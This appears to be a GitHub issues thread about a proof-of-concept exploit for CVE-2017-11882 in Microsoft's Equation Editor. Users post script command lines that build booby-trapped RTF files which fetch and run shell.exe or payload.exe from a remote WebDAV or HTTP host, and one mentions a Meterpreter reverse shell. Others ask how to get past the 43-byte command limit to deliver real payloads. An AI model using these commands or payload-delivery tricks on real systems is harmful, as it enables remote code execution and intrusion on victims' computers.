embedi / cve-2017-11882
Proof-of-Concept exploits for CVE-2017-11882
Greetings. It appears that in order for this script to work (for me), I had to supply the following arguments to the script:
python webdav_exec_CVE-2017-11882.py -u \\\\192.168.x.x\\webdav -e \\\\192.168.x.x\\webdav\\shell.exe -o text.rtf
Otherwise, if I did this:
python webdav_exec_CVE-2017-11882.py -u \\192.168.x.x\webdav -e \\192.168.x.x\webdav\shell.exe -o text.rtf
I would get an error from Word saying could not find resource from \192.168.x.xwebdav.
It appears that the Python script, on my end, needed the backslash character to escape the backslash. I was able to weaponize (I think) this exploit using Meterpreter's handler and a Meterpreter reverse TCP payload. However, when I enter the WebDAV path in Windows using Win+R, Windows somehow opens up the WebDAV location in Explorer before the Meterpreter session could be established. Is anyone else, or are you, experiencing this? Is this normal behavior?
As Design Science licensed their reduced equation editor not only to Microsoft, but to other vendors, the question arises whether their equation editors are also vulnerable.
Is there a simple way to be sure?
To name just a few:
XP Tech Equation 2
SoftMaker Formeleditor
Corel Equation 2.0
GRAMS Equation 2.1
Sakbr Software Equation 2.1
Hi,
Can you please explain how to use this PoC?
I tried many ways; it's not working.
I mean with a real payload, not calc.exe:
python webdav_exec_CVE-2017-11882.py -u http://192.168.1.166/payload.exe -e payload.exe -o test.rtf
But it shows me an error:
Traceback (most recent call last):
File "webdav_exec_CVE-2017-11882.py", line 152, in
rtf_content = create_rtf(RTF_HEADER, RTF_TRAILER, args.url, args.executable)
File "webdav_exec_CVE-2017-11882.py", line 137, in create_rtf
ole1 = create_ole_exec_primitive("cmd.exe /c start " + remote_location + " &")
File "webdav_exec_CVE-2017-11882.py", line 129, in create_ole_exec_primitive
raise ValueError("primitive command must be shorter than 43 bytes")
ValueError: primitive command must be shorter than 43 bytes
Thanks
Can I edit the OLE data?
What should this data be to exploit the vulnerability, and how do I know the offset of the command that will be executed?
Why is the maximum size of the request equal to 43?
How to increase its size?